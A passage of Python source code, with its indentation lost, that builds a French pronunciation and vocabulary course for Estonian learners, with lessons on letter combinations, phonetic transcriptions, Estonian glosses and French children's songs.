g
gn
gu
h
ien
il
ill
in
j
oi
oe
oin
on
ou
u
ueil
ui
un
y]
""")
Reeglid = Pronounciation.add_section(u"Reeglid",ref="reeglid")
if output_format == "rst":
Reeglid.intro = u"""
Ülevaade:
- [ref u], [ref ou], [ref ui], [ref eu], [ref au], [ref eau], [ref oi], [ref ai], [ref y], [ref oe]
- [ref on], [ref an], [ref en], [ref un], [ref in], [ref ain], [ref ein], [ref ien], [ref oin]
- [ref c], [ref h], [ref ch], [ref cedille]
- [ref er], [ref et], [ref ent]
- [ref j], [ref g], [ref gu], [ref gn]
- [ref il], [ref ill], [ref ail], [ref eil], [ref euil], [ref ueil]
"""
#~ if FULL_CONTENT:
#~ Eesti = Pronounciation.add_section(u"Veel")
#~ Vocabulary = book.add_section(u"Sõnavara",intro=u"""
#~ Teises osa hakkame õpima sõnavara,
#~ oletades et hääldamine on enam vähem selge.
#~ """)
Vocabulary = book
#~ General = Vocabulary.add_section(u"Üldiselt")
General = Vocabulary.add_section(u"Üldine sõnavara")
Kokadele = Vocabulary.add_section(u"Kulinaaria")
if HAS_FUN:
Fun = Vocabulary.add_section(u"Laulud")
if HAS_EXERCICES:
Exercices = Vocabulary.add_section(u"Harjutused")
Intro.add_lesson(u"Tuntud sõnad", intro=u"""
Mõned sõnad, mida sa juba tead.
Tutvumine hääldamiskirjaga.
""")
Intro.parse_words(None,u"""
la soupe [sup] : supp
la carte [kart] : kaart
à la carte [ala'kart] : menüü järgi
le vase [vaaz] : vaas
la douche [duš] : dušš
le disque [disk] : ketas
merci [mär'si] : aitäh
le garage [ga'raaž] : garaaž
le journal [žur'nal] : päevik | ajaleht
""")
Intro.add_after(u"""
Kuna hääldamine on algaja peamine raskus,
tuleb meil seda kuidagi kirja panna.
Seda teeme sõnade taha nurksulgudes (**[]**).
- **ou** hääldatakse **[u]**.
- **e** sõna lõpus kaob ära
""")
Intro.add_lesson(u"Hääldamiskirjeldus", intro=u"""
Hääldamiskirjeldustes kasutame
kohandatud `X-SAMPA
<http://fr.wiktionary.org/wiki/Annexe:Prononciation/fran%C3%A7ais>`_ variant,
mis on eestlastele intuitiivsem õppida
kui näiteks `IPA
<http://en.wiktionary.org/wiki/Wiktionary:IPA>`_ (International
Phonetic Alphabet).
- Üldiselt loed lihtsalt seda, mis on nurksulgudes.
- Pikad kaashäälikud on topelt.
- Apostroof (') näitab, milline silp on **rõhutatud**.
Prantsuse keeles on rõhk tavaliselt viimasel silbil.
Mõned helid tuleb õppida:
==== ================== ====================== =======================================
täht selgitus näided e.k. näided pr.k.
==== ================== ====================== =======================================
[ə] tumm e Lott\ **e** **je** [žə], **ne** [nə]
[o] kinnine o L\ **oo**\ ne **mot** [mo], **beau** [boo]
[O] avatud o L\ **o**\ tte **bonne** [bOn], **mort** [mOOr]
[ö] kinnine ö l\ **öö**\ ve **feu** [föö], **peu** [pöö]
[Ö] avatud ö ingl.k. "g\ **ir**\ l" **beurre** [bÖÖr], **jeune** [žÖÖn]
[w] pehme w ingl.k. "\ **w**\ ow" **toilettes** [twa'lät], **boudoir** [bud'waar]
[O~] nasaalne [o] - **bonjour** [bO~'žuur], **mon** [mO~]
[A~] nasaalne [O] - **tante** ['tA~tə], **prendre** ['prA~drə]
[Ö~] nasaalne [Ö] - **un** [Ö~], **parfum** [par'fÖ~]
[Ä~] nasaalne [ä] - **chien** [šiÄ~], **rien** [riÄ~]
==== ================== ====================== =======================================
""")
Eestlastele.add_lesson("Mesilashäälikud", intro="""
"Mesilashäälikud" on **s**, **š**, **z** ja **ž**.
Nad on eesti keeles ka olemas, aga prantsuse keeles on
nende erinevus palju olulisem.
=========== ===========================
terav pehme
=========== ===========================
**s**\ upp **z**\ oom
**š**\ okk **ž**\ est
=========== ===========================
""",ref="s")
Eestlastele.parse_words(None,u"""
la soupe [sup] : supp
le garage [ga'raaž] : garaaž
le geste [žäst] : žest | liigutus
le choc [žOk] : šokk | löök
""")
if FULL_CONTENT:
Eestlastele.parse_words(None,u"""
le genre [žA~rə] : žanre
""")
Intro.add_lesson(u"Artikkel", intro=u"""
Nagu inglise keeles pannakse ka prantsuse keeles nimisõnade ette *artikkel*.
Prantsuse keeles on kõikidel asjadel lisaks oma **sugu**.
Näiteks laud (*la table*) on naissoost,
raamat (*le livre*) on meessoost.
Kui sul on mitu lauda või mitu raamatu,
siis on neil sama artikkel **les**: *les tables* ja *les livres*.
Kui sõna algab täishäälikuga, siis kaob
artiklitest *le* ja *la* viimane
täht ära ja nad muutuvad mõlemad **l'**-ks.
Artiklid *le*, *la* ja *les* nimetatakse **määravaks** artikliteks.
Määrava artikli asemel võib ka olla **umbmäärane** artikkel:
**un** (meessoost), **une** (naissoost) või **des** (mitmus).
Erinevus on nagu inglise keeles, kus on olemas määrav
artikkel **the** ja umbmäärane artikel **a**.
Olenevalt kontekstist kasutatakse kas see või teine.
Näiteks
"I am **a** man from Vigala"
ja
"I am **the** man you need".
Kokkuvõteks:
========== ============= =============
sugu määrav umbmäärane
========== ============= =============
meessoost **le** [lə] **un** [Ö~]
naissoost **la** [la] **une** [ün]
mitmus **les** [lä] **des** [dä]
========== ============= =============
""")
#~ Intro.parse_words(Autre,u"""
#~ le [lə] : (määrav meessoost artikkel)
#~ la [la] : (määrav naissoost artikkel)
#~ les [lä] : (määrav artikkel mitmus)
#~ """)
#~ Intro.parse_words(Autre,u"""
#~ un [Ö~] : (umbmäärane meessoost artikkel)
#~ une [ün] : (umbmäärane naissoost artikkel)
#~ des [dä] : (umbmäärane artikkel mitmus)
#~ """)
Intro.add_lesson(u"Rõhutud, aga lühike", intro=u"""
Rõhutatud täishäälikud ei ole sellepärast tingimata pikad.
Prantsuse keeles tuleb tihti ette, et sõna lõpeb *lühikese* täishäälikuga.
""")
Intro.parse_words(Nom,u"""
le menu [mə'nü] : menüü
le chocolat [šoko'la] : šokolaad
le plat [pla] : roog | kauss
le cinéma [sine'ma] : kino
le paradis [para'di] : paradiis
""")
Intro.add_lesson(u"O on kinnine või avatud", u"""
Helid **[o]** ja **[ö]** on eesti keeles alati *kinnised*.
Prantsuse keeles on lisaks ka *avatud* vormid.
Hääldamiskirjelduses on kinnine vorm **väikese** tähega ja
avatud vorm **suure** tähega.
""")
Intro.parse_words(Autre,u"""
je donne [dOn] : ma annan
je dors [dOOr] : ma magan
""")
Intro.parse_words(Nom,u"""
le dos [do] : selg
le mot [mo] : sõna
le tome [toom] : köide
""")
if FULL_CONTENT:
Intro.parse_words(Nom,u"""
la mort [mOOr] : surm
le or [OOr] : kuld
le boulot [bu'lo] : töö (kõnekeel)
le bouleau [bu'loo] : kask
le bureau [bü'roo] : büroo
""")
if not FULL_CONTENT:
Eestlastele.add_lesson(u"Cold gold, big pigs and downtowns", u"""
Erinevus tugeva ja nõrda K, P või T vahel on prantsuse keeles sama
oluline nagu inglise ja saksa keeles.
""",ref="kpt")
Eestlastele.parse_words(Autre,u"""
la gare [gaar] : raudteejaam
le car [kaar] : reisibuss
la bière [bjäär] : õlu
la pierre [pjäär] : kivi
le doigt [dwa] : sõrm
le toit [twa] : katus
""")
else:
Eestlastele.add_lesson(u"b ja p", u"""
b ja p on prantsuse keeles selgelt erinevad.
""")
Eestlastele.parse_words(None,u"""
la bière [bjäär] : õlu
la pierre [pjäär] : kivi
le bon [bO~] : tšekk | talong
le pont [pO~] : sild
le bon ton [bO~'tO~] : viisakus
le ponton [pO~'tO~] : pontoon (nt. pontoonsild)
la peau [poo] : nahk
beau (m.) : ilus
le bois [bwa] : puu (materjal) | mets
le poids [pwa] : kaal
""")
Eestlastele.add_lesson(u"d ja t", u"""
d ja t on prantsuse keeles selgelt erinevad.
""")
Eestlastele.parse_words(None,u"""
le don [dO~] : annetus
le ton [tO~] : toon
le centre ['sA~trə] : keskus
la cendre ['sA~drə] : tuhk
je donne [dOn] : ma annan
la tonne [tOn] : tonn
le toit [twa] : katus
le doigt [dwa] : sõrm
""")
Eestlastele.add_lesson(u"g ja k", u"""
g ja k on prantsuse keeles selgelt erinevad.
""")
Eestlastele.parse_words(None,u"""
le gond [gO~] : uksehing
le con [kO~] : loll
la gare [gaar] : raudteejaam
le car [kaar] : reisibuss
car [kaar] : sest
le garçon [gar'sO~] : poiss
Qui est Guy? [ki ä gi] : Kes on Guy?
""")
Reeglid.add_lesson(u"u", intro=u"""
**u** (siis kui see pole teise täishäälikuga koos)
hääldatakse **[ü]** või **[üü]**.
""",ref="u")
Reeglid.parse_words(Nom,u"""
le bureau [bü'roo] : büroo
le bus [büs] : buss
# le mur [müür] : sein | müür
la puce [püs] : kirp
le jus [žü] : mahl
# le but [büt] : eesmärk
# la pute [püt] : hoor
le sucre ['sükrə] : suhkur
""")
Reeglid.add_lesson(u"ou", intro=u"""
**ou** hääldatakse **[u]** või **[uu]**.
""",ref="ou")
Reeglid.parse_words(None,u"""
le journal [žur'nal] : päevik | ajaleht
le cours [kuur] : kursus | tund (koolis)
le cou [ku] : kael
le goût [gu] : maitse
""")
Reeglid.add_lesson(u"ui",
u"""
**ui** hääldatakse **[wi]** või **[wii]** (mida
kirjutatakse vahest ka **[üi]** või **[üii]**).
""",ref="ui")
Reeglid.parse_words(None,u"""
la suite [swit] : järg | tagajärg | rida, kord | saatjaskond
bonne nuit [bOnə 'nwi] : head ööd
la cuisine [kwi'zin] : köök
je cuis [žə kwi] : ma keedan
je suis [žə swi] : ma olen | ma järgnen
""")
Reeglid.add_lesson(u"eu", u"""
**eu** hääldatakse **[öö]** või **[ÖÖ]**.
""",ref="eu")
Reeglid.parse_words(None,u"""
le feu [föö] : tuli
# le neveu [nə'vöö] : onupoeg | tädipoeg
je veux [žə vöö] : ma tahan
""")
Reeglid.parse_words(Autre,u"""
# neutre (mf) ['nöötrə] : neutraalne
""")
Reeglid.parse_words(Numerique,u"""
neuf [nÖf] : üheksa
""")
Reeglid.parse_words(Nom,u"""
le professeur [profesÖÖr] : professor
le beurre [bÖÖr] : või
la peur [pÖÖr] : hirm
""")
#~ Reeglid.parse_words(None,u"""
#~ l'huile (f) [wil] : õli
#~ cuire [kwiir] : keetma
#~ suivre ['swiivrə] : järgima
#~ la cuillère [kwi'jäär] : lusikas
#~ """)
Reeglid.add_lesson(u"au",
intro=u"""
**au** hääldatakse **[o]** või **[oo]**.
""",ref="au")
Reeglid.parse_words(None,u"""
une auberge [o'bäržə] : võõrastemaja
un auteur [o'tÖÖr] : autor
""")
Reeglid.add_lesson(u"eau",
intro=u"""
**eau** hääldatakse **[oo]**.
Nagu [ref au], aga **e** ühineb nendega ja kaob ära.
""",ref="eau")
Reeglid.parse_words(None,u"""
le château [ša'too] : loss
le bateau [ba'too] : laev
la eau [oo] : vesi
""")
Reeglid.add_lesson(u"oi",
u"""
**oi** hääldatakse **[wa]**.
Vaata ka [ref oin].
""",ref="oi")
Reeglid.parse_words(Autre,u"""
voilà [vwa'la] : näe siin
trois [trwa] : kolm
bonsoir [bO~'swaar] : head õhtut
au revoir [orə'vwaar] : nägemiseni
""")
Reeglid.parse_words(Nom,u"""
le roi [rwa] : kuningas
la loi [lwa] : seadus
la toilette [twa'lät] : tualett
""")
Reeglid.add_lesson(u"ai",
u"""
**ai** hääldatakse **[ä]** või **[ää]**
(mõnikord ka **[ə]**).
""",ref="ai")
Reeglid.parse_words(Nom,u"""
la maison [mä'zO~] : maja
le domaine [do'mään] : domeen
la fraise [frääz] : maasikas
# la paire [päär] : paar
""")
Reeglid.parse_words(Adjectif,u"""
frais [frä] | fraiche [fräš] : värske
""")
Reeglid.parse_words(None,u"""
nous faisons [nu fə'zO~] : meie teeme
le faisan [fə'zA~] : faasan
""")
Reeglid.add_lesson(u"y", u"""
**y** hääldatakse alati **[i]** ja mitte kunagi **[ü]**.
""",ref="y")
Reeglid.parse_words(Nom,u"""
le cygne ['sinjə] : luik
le système [sis'tääm] : süsteem
le mythe [mit] : müüt
""")
Reeglid.add_lesson(u"œ", u"""
**œ** hääldatakse alati **[ÖÖ]**.
""",ref="oe")
Reeglid.parse_words(Nom,u"""
# le nœud [nöö] : sõlm
le cœur [kÖÖr] : süda
#le chœur [kÖÖr] : koor (laulu-)
le bœuf [bÖff] : härg
le œuf [Öf] : muna
la œuvre [ÖÖvrə] : töö, teos
le *hors d'œuvre [hOOr 'dÖÖvrə] : eelroog
""")
if HAS_FUN:
Fun.add_lesson(u"Frère Jacques", u"""
| Frère Jacques, frère Jacques,
| dormez-vous? Dormez-vous?
| Sonnez les matines, sonnez les matines
| ding, dang, dong! Ding, dang, dong!
""")
Fun.parse_words(NomPropre,u"""
Jacques [žaak] : Jaak
""")
Fun.parse_words(None,u"""
le frère [fräär] : vend
dormez-vous? [dOrmee'vu] : kas Te magate?
Sonnez les matines [sO'ne lä ma'tinə] : lööge hommikukellad
""")
Fun.add_lesson(u"Dans sa maison un grand cerf ", u"""
| Dans sa maison un grand cerf
| regardait par la fenêtre
| un lapin venir à lui
| et frapper ainsi.
| «Cerf, cerf, ouvre moi
| ou le chasseur me tuera!»
| «Lapin, lapin entre et viens
| me serrer la main.»
""")
Fun.parse_words(Verbe,u"""
il regardait [rəgar'dä] : ta vaatas
""")
Fun.parse_words(None,u"""
ouvre-moi [uuvrə'mwa] : tee mulle lahti
ou [u] : või
il me tuera [il mə tüə'ra] : ta tapab mind
serrer [sä'ree] : suruma
grand [grA~] | grande [grA~də]: suur
""")
Fun.parse_words(Nom,u"""
la maison [mä'zO~] : maja
le cerf [säär] : hirv
la fenêtre [fə'näätrə] : aken
le lapin [lapÄ~] : küünik
le chasseur [ša'sÖÖr] : jahimees
la main [mÄ~] : käsi
""")
Fun.add_lesson(u"Un kilomètre à pied", u"""
| Un kilomètre à pied,
| ça use, ça use,
| un kilomètre à pied,
| ça use les souliers.
""")
Fun.parse_words(None,u"""
le pied [pjee] : jalaots
à pied [a'pjee] : jalgsi
ça use [sa 'üüzə] : see kulutab
le soulier [sul'jee] : king
""")
Fun.add_lesson(u"La peinture à l'huile", u"""
| La peinture à l'huile
| c'est bien difficile
| mais c'est bien plus beau
| que la peinture à l'eau
""")
Fun.parse_words(None,u"""
la peinture [pÄ~'tüür] : värvimine
la huile [wilə] : õli
la eau [oo] : vesi
difficile [difi'silə] : raske
mais [mä] : aga
beau [boo] | belle [bälə] : ilus
plus beau [plü boo] : ilusam
""")
if HAS_FUN:
Fun.add_lesson(u"Meunier, tu dors", u"""
| Meunier, tu dors, ton moulin va trop vite.
| Meunier, tu dors, ton moulin va trop fort.
| Ton moulin, ton moulin va trop vite.
| Ton moulin, ton moulin va trop fort.
""")
Fun.parse_words(None,u"""
le meunier [mÖn'jee] : mölder
le moulin [mu'lÄ~] : veski
tu dors [dOOr] : sa magad
trop vite [tro'vitə] : liiga kiiresti
trop fort [tro'fOOr] : liiga kõvasti
""")
if HAS_FUN and FULL_CONTENT:
Fun.add_lesson(u"Minu onu...",
u"""
| Mon tonton et ton tonton sont deux tontons,
| mon tonton tond ton tonton
| et ton tonton tond mon tonton.
| Qu'est-ce qui reste?
""")
Fun.parse_words(None,u"""
mon [mO~] : minu
ton [tO~]: sinu
ils sont [sO~]: nad on
""")
Fun.parse_words(Numerique,u"""
deux [döö] : kaks
""")
Fun.parse_words(Nom,u"""
le tonton [tO~'tO~] : onu
""")
Fun.parse_words(Verbe,u"""
tondre [tO~drə] : pügama
rester [räs'tee] : üle jääma
""")
Fun.parse_words(None,u"""
Qu'est-ce qui reste? [käski'räst?] : Mis jääb üle?
""")
#~ """
#~ le nôtre ['nootrə] : meie oma
#~ """
Reeglid.add_lesson(u"on & om",
u"""
**on** ja **om** hääldatakse **[O~]**,
v.a. siis kui järgneb täishäälik või teine **n** või **m**.
""",ref="on")
Reeglid.parse_words(Nom,u"""
le salon [sa'lO~] : salong (= uhke tuba)
# un oncle [O~klə] : onu
la bombe ['bO~mbə] : pomm
""")
Reeglid.parse_words(Autre,u"""
bonjour [bO~'žuur] : tere | head päeva | tere hommikust
bonne nuit [bOnə 'nwi] : head ööd
bon appétit [bOnappe'ti] : head isu
""")
Reeglid.add_lesson(u"an & am",
u"""
**an** ja **am** hääldatakse **[A~]**,
v.a. siis kui järgneb täishäälik või teine **n** või **m**.
""",ref="an")
Reeglid.parse_words(Nom,u"""
le an [A~] : aasta
la année [a'nee] : aasta
la lampe [lA~p] : lamp
le enfant [A~'fA~] : laps
""")
Reeglid.add_lesson(u"en & em",
u"""
**en** ja **em** hääldatakse **[A~]**,
v. a. siis kui järgneb täishäälik või teine **n** või **m**.
""",ref="en")
Reeglid.parse_words(Nom,u"""
le rendez-vous [rA~de'vu] : kohtumine
# le commentaire [komA~'täär] : märkus, kommentar
le centre ['sA~trə] : keskus
le renne [rän] : põhjapõder
# le genre [žA~rə] : žanre
un enfant [A~'fA~] : laps
le employeur [A~plwa'jÖÖr] : tööandja
""")
Reeglid.add_lesson(u"un & um",
u"""
**um** ja **un** hääldatakse **[Ö~]**,
v.a. siis kui järgneb täishäälik või teine **m** / **n**.
""",ref="un")
Reeglid.parse_words(NomPropre,u"""
Verdun [vär'dÖ~] : -
""")
Reeglid.parse_words(Nom,u"""
le parfum [par'fÖ~] : hea lõhn v. maitse
""")
Reeglid.parse_words(Adjectif,u"""
parfumé [parfü'mee] | parfumée [parfü'mee] : lõhnastatud
brun [brÖ~] | brune [brün] : pruun
# aucun [o'kÖ~] | aucune [o'kün] : mitte üks
""")
#~ chacun [ža'kÖ~] | chacun [ža'kün] : igaüks
Reeglid.add_lesson(u"in & im",
u"""
**in** ja **im** hääldatakse **[Ä~]**,
v.a. siis kui järgneb täishäälik või teine **n** või **m**.
Vaata ka [ref ain].
""",ref="in")
Reeglid.parse_words(None,u"""
la information [Ä~formasjO~] : informatsioon
le imperméable [Ä~pärme'aablə] : vihmajope
la image [i'maaž] : pilt
le vin [vÄ~]: vein
le bassin [ba'sÄ~] : bassein
le dessin [de'sÄ~] : joonistus
je dessine [de'sin] : ma joonistan
""")
Reeglid.parse_words(Adjectif,u"""
inutile (mf) [inü'til] : kasutu
""")
#~ Reeglid.add_lesson(u"ain, aim, ein, eim",
#~ u"""
#~ Kui **a** või **e** on **in**/**im** ees,
#~ siis see sulab nendega kokku ja kaob ära.
#~ """,ref="ain")
#~ Reeglid.parse_words(Nom,u"""
#~ le pain [pÄ~] : sai | leib
#~ le gain [gÄ~] : kasu
#~ la main [mÄ~] : käsi
#~ la faim [fÄ~] : nälg
#~ """)
#~ Reeglid.parse_words(NomPropre,u"""
#~ Reims [rÄ~s] : (linn)
#~ """)
Reeglid.add_lesson(u"ain & aim",
u"""
**ain** ja **aim** hääldatakse **[Ä~]**. **a** ühineb **in**/**im**-ga ja kaob ära.
Sama loogika nagu [ref ein].
""",ref="ain")
Reeglid.parse_words(Nom,u"""
le pain [pÄ~] : sai | leib
# le gain [gÄ~] : kasu
la main [mÄ~] : käsi
la faim [fÄ~] : nälg
""")
Reeglid.add_lesson(u"ein & eim",
u"""
**ein** ja **eim** hääldatakse **[Ä~]**. **e** ühineb **in**/**im**-ga ja kaob ära.
Sama loogika nagu [ref ain].
""",ref="ein")
Reeglid.parse_words(Nom,u"""
le rein [rÄ~] : neer (anat.)
la reine [rään] : kuninganna
""")
Reeglid.parse_words(NomPropre,u"""
Reims [rÄ~s] : (linn)
""")
Reeglid.add_lesson(u"ien",
u"""
**ien** hääldatakse **[jÄ~]** v.a. siis kui järgneb teine **n**.
""",ref="ien")
Reeglid.parse_words(None,u"""
le chien [šiÄ~] : koer
la chienne [šjän] : emakoer
""")
Reeglid.parse_words(Autre,u"""
bien [biÄ~] : hästi
rien [riÄ~] : ei midagi
""")
Reeglid.add_lesson(u"oin",
u"""
**oin** hääldatakse **[wÄ~]**.
Reegel [ref oi] ei kehti sel juhul, sest *i* sulab *n*-iga kokku.
""",ref="oin")
Reeglid.parse_words(None,u"""
# le coin [kwÄ~] : nurk
le point [pwÄ~] : punkt
""")
Reeglid.parse_words(Autre,u"""
besoin [bə'zwÄ~] : vaja
# loin [lwÄ~] : kauge
""")
Reeglid.add_lesson(u"c", u"""
**c** hääldatakse **[s]** siis
kui järgneb **e**, **i** või **y**,
ja muidu **[k]** (ja mitte kunagi **[tš]**).
Sõna lõpus kaob mõnikord ära.
""",ref="c")
Reeglid.parse_words(None,u"""
la casserole [kas'roll] : kastrul
la confiture [kO~fi'tüür] : moos | keedis
la cuisse [kwis] : reis | kints
le certificat [särtifi'ka] : tsertifikaat
la cire [siir] : vaha
le centre ['sA~trə] : keskus
le cygne ['sinjə] : luik
la classe [klas] : klass
le tabac [ta'ba] : tubak
""")
Reeglid.parse_words(NomPropre,u"""
octobre [ok'tOObrə] : oktoober
Marc [mark] : Markus
""")
Reeglid.parse_words(Numerique,u"""
cinq [sÄ~k] : viis
""")
if FULL_CONTENT:
Reeglid.parse_words(None,u"""
le câble ['kaablə] : kaabel
la cible ['siiblə] : märklaud
la comédie [kome'dii] : komöödia
le comble ['kO~blə] : kõrgeim v. ülim aste
la cure [küür] : kuur
la croûte [krut] : koorik
un acacia [akasj'a] : akaatsia (põõsas)
""")
Reeglid.add_lesson(u"h", u"""
**h** ei hääldata kunagi.
""",ref="h")
#~ (Vaata ka [ref haspire])
Reeglid.parse_words(Nom,u"""
le hélicoptère [elikop'täär] : helikopter
le hôtel [o'täl] : hotell
le autel [o'täl] : altar
""")
if FULL_CONTENT:
Reeglid.add_lesson(u"h aspiré", u"""
Kuigi **h** ei hääldata kunagi ([vt. [ref h]]),
on neid kaks tüüpi: «h muet» (tumm h)
ja «h aspiré» (sisse hingatud h).
Viimane tähistatakse sõnaraamatutes tärniga (*).
Erinevus koosneb selles, kuidas eesolev sõna liitub nendega.
""",ref="haspire")
Reeglid.parse_words(Nom,u"""
le hélicoptère [elikop'täär] : helikopter
le hôtel [o'täl] : hotell
le homme [Om] : mees
le *haricot [ari'ko] : uba
le *héros [e'ro] : kangelane
le *hibou [i'bu] : öökull
""")
Reeglid.add_lesson(u"ch", u"""
**ch** hääldatakse tavaliselt **[š]** ja mõnikord (kreeka päritolu sõnades) **[k]**,
ja mitte kunagi **[tš]**.
""",ref="ch")
Reeglid.parse_words(Nom,u"""
le chat [ša] : kass
la biche [biš] : emahirv
le chœur [kÖÖr] : koor (laulu-)
le psychologue [psiko'lOOgə] : psüholoog
""")
"""
la chèvre ['šäävrə] : kits
la chambre [šA~mbrə] : tuba
le parachute [para'šüt] : langevari
le Christe [krist] : Kristus
une chope [žOp] : õlu
le chien [šjÄ~] : koer
un achat [a'ša] : ost
"""
Reeglid.add_lesson(u"ç", u"""
**ç** hääldatakse alati **[s]**.
""",ref="cedille")
Reeglid.parse_words(None,u"""
la leçon [lə~sO~]: lektsioon
# la rançon [rA~sO~]: lunaraha
le reçu [rə'sü] : kviitung
le maçon [ma'sO~] : müürsepp
""")
Reeglid.add_lesson(u"-er & -ez",
u"""
**-er** ja **-ez** sõna lõpus hääldatakse **[ee]**.
""",ref="er")
Reeglid.parse_words(None,u"""
manger [mA~'žee] : sööma
vous mangez [mA~'žee] : te sööte
aimer [ä'mee] : armastama
vous aimez [ä'mee] : te armastate
""")
Reeglid.add_lesson(u"-et",
u"""
**-et** sõna lõpus hääldatakse **[ä]**.
""",ref="et")
Reeglid.parse_words(None,u"""
le fouet [fu'ä] : vispel
le fumet [fü'mä] : hea lõhn (nt. veini, liha kohta)
""")
Reeglid.add_lesson(u"-ent",
u"""
**-ent** sõna lõpus hääldatakse **[ə]** siis kui tegemist
on *tegusõna kolmada mitmuse vormiga*.
Muidu kehtib reegel [ref en] (hääldatakse **[A~]**).
""",ref="ent")
Reeglid.parse_words(None,u"""
ils couvent [il 'kuuvə] : nad munevad
le couvent [ku'vA~] : klooster
souvent [su'vA~] : tihti
""")
Reeglid.add_lesson(u"j",
u"""
**j** hääldatakse **[ž]** (ja mitte [dž]).
""",ref="j")
Reeglid.parse_words(None,u"""
majeur [mažÖÖr] : suurem
je [žə] : mina
jamais [ža'mä] : mitte iialgi
""")
Reeglid.parse_words(NomPropre,u"""
Josephe [žo'zäf] : Joosep
""")
Reeglid.add_lesson(u"g",
u"""
**g** hääldatakse **[g]** kui järgneb **a**, **o**, **u**
või kaashäälik, aga **[ž]** kui järgneb **e**, **i** või **y**.
""",ref="g")
Reeglid.parse_words(None,u"""
le gorille [go'rijə] : gorilla
la gazelle [ga'zäl] : gasell
la giraffe [ži'raf] : kaelkirjak
# le gymnase [žim'naaz] : gümnaasium
# le juge [žüüž] : kohtunik
# la géologie [žeolo'žii] : geoloogia
général [žene'ral] : üldine
le général [žene'ral] : generaal
""")
Reeglid.add_lesson(u"gu",
u"""
**gu** hääldatakse **[g]** (s.t. **u** kaob ära)
siis kui järgneb **e**, **i** või **y**.
""",ref="gu")
Reeglid.parse_words(None,u"""
le guépard [ge'paar] : gepard
le guide [giid] : reisijuht
la guitare [gi'taar] : kitarr
la guerre [gäär] : sõda
Guy [gi] : (eesnimi)
Gustave [güs'taav] : (eesnimi)
aigu [ä'gü] : terav, ...
""")
Reeglid.add_lesson(u"gn", u"""
**gn** hääldatakse **[nj]**.
""",ref="gn")
Reeglid.parse_words(None,u"""
magnifique (nf) [manji'fik] : surepärane
le cognac [kon'jak] : konjak
le signal [sin'jal] : signaal
""")
#~ Reeglid.parse_words(Verbe,u"""
#~ soigner [swan'jee] : ravima | hoolitsema
#~ """)
Reeglid.parse_words(NomGeographique,u"""
Avignon [avin'jO~] : -
""")
#~ """
#~ la ligne ['linjə] : liin | rida
#~ le signe ['sinjə] : märk
#~ la besogne [bə'zOnjə] : töö | tegu | ülesanne
#~ """
Reeglid.add_lesson(u'il',
u"""
**il** (sõna lõpus ja kaashääliku taga)
hääldatakse kas **[i]** või **[il]**.
""",ref="il")
Reeglid.parse_words(None,u"""
il [il] : tema
le persil [pär'sil] : petersell
le outil [u'ti] : tööriist
# le fusil [fü'zi] : püss
subtil (m) [süp'til] : peen, subtiilne
gentil (m) [žA~'ti] : armas
# le exil [äg'zil] : eksiil
""")
Reeglid.add_lesson(u"ill", u"""
**ill** hääldatakse **[iij]** või **[ij]**.
Erandid on sõnad *ville* ja *mille*.
""",ref="ill")
Reeglid.parse_words(None,u"""
# la bille [biije] : kuul
la anguille [A~'giije] : angerjas
la myrtille [mir'tiije] : mustikas
la famille [fa'miije] : perekond
la cuillère [kwi'jäär] : lusikas
# le pillage [pij'aaž] : rüüstamine
""")
Reeglid.parse_words(None,u"""
la ville [vil] : linn
mille [mil] : tuhat
le million [mil'jO~] : miljon
""")
#~ tranquille [trA~kiije] : rahulik
Reeglid.add_lesson(u"ail",
u"""
**ail** hääldatakse **[aj]** :
siin ei kehti reegel [ref ai], sest *i* sulab *l*-iga kokku.
""",ref="ail")
Reeglid.parse_words(Nom,u"""
l'ail (m) [aj] : küüslauk
le travail [tra'vaj] : töö
le détail [detaj] : detail
# l'aile (f) [ääl] : tiib
""")
Reeglid.parse_words(NomGeographique,u"""
Versailles [ver'sajə] : Versailles
""")
Reeglid.add_lesson(u'eil',
u"""
**eil** ja **eille** hääldatakse **[eij]**.
""",ref="eil")
Reeglid.parse_words(None,u"""
le réveil [re'veij] : äratuskell
le soleil [so'leij] : päike
la merveille [mär'veij] : ime
merveilleux [märvei'jöö] : imeline
# le réveillon [revei'jO~] : vana-aasta õhtu söök
la groseille [gro'zeij] : sõstar (punane v. valge) | tikker
# vieille (f) [vjeij] : vana
# la veille [veij] : pühalaupäev
""")
Reeglid.add_lesson(u"ueil",u"""
**ueil** hääldatakse **[Öj]**.
""",ref="ueil")
Reeglid.parse_words(None,u"""
le accueil [a'kÖj] : vastuvõtt
le orgueil [Or'gÖj] : ülbus
""")
Reeglid.add_lesson(u"euil",
u"""
**euil** hääldatakse **[Öj]**.
""",ref="euil")
Reeglid.parse_words(None,u"""
le chevreuil [šəv'rÖj] : metskits
le écureuil [ekü'rÖj] : orav
""")
if False:
Pronounciation.add_lesson(u"[äär]", u"""
Kui kuuled [äär], siis kirjutad kas **ère**, **aire**, **ère**, **erre** või **er**.
""")
Pronounciation.parse_words(None,u"""
le père [päär] : isa
la paire [päär] : paar
le maire [määr] : linnapea
la mère [määr] : ema
la mer [määr] : meri
amer (m) [a'määr] : kibe
la bière [bjäär] : õlu
la pierre [pjäär] : kivi
la terre [täär] : muld
""")
if FULL_CONTENT:
Eestlastele.add_lesson(u"v ja f", u"""
Ettevaatust, **v** ei ole **f**!
""")
Eestlastele.parse_words(None,u"""
vous [vu] : teie
fou [fu] : hull
# vous êtes fous [vu'zäät fu] : te olete lollid
je veux [žə vöö] : ma tahan
le feu [föö] : tuli
la fille [fiij] : tüdruk | tütar
la vie [vii] : elu
la fin [fÄ~] : lõpp
le vin [vÄ~] : vein
""")
Eestlastele.add_lesson("gn ja ng", """
Ettevaatust, **gn** ei ole **ng**!
""")
Eestlastele.parse_words(Nom,u"""
le ange [A~ž] : ingel
le agneau [an'joo] : tall
le singe [sÄ~ž] : ahv
le signe ['sinjə] : märk
le linge [lÄ~ž] : pesu
la ligne ['linjə] : liin | rida
le songe [sO~ž] : unenägu
la besogne [bə'zOnjə] : ülesanne | kohustus
""")
Eestlastele.add_lesson(u"Sugu on oluline", u"""
Siin mõned näited, et sugu pole sugugi ebatähtis.
""")
Eestlastele.parse_words(Nom,u"""
le père [päär] : isa
la paire [päär] : paar
le maire [määr] : linnapea
la mère [määr] : ema
le tour [tuur] : tiir
la tour [tuur] : torn
le mur [müür] : sein | müür
la mûre [müür] : põldmari
le cours [kuur] : kursus | tund (koolis)
la cour [kuur] : õu, hoov | kohus
""")
#~ Eestlastele.parse_words(None,u"""
#~ court (m) [kuur] : lühike
#~ """)
Eestlastele.add_lesson(u"Ära aja segamini!", u"""
Mõned harjutused veel...
""")
Eestlastele.parse_words(Autre,u"""
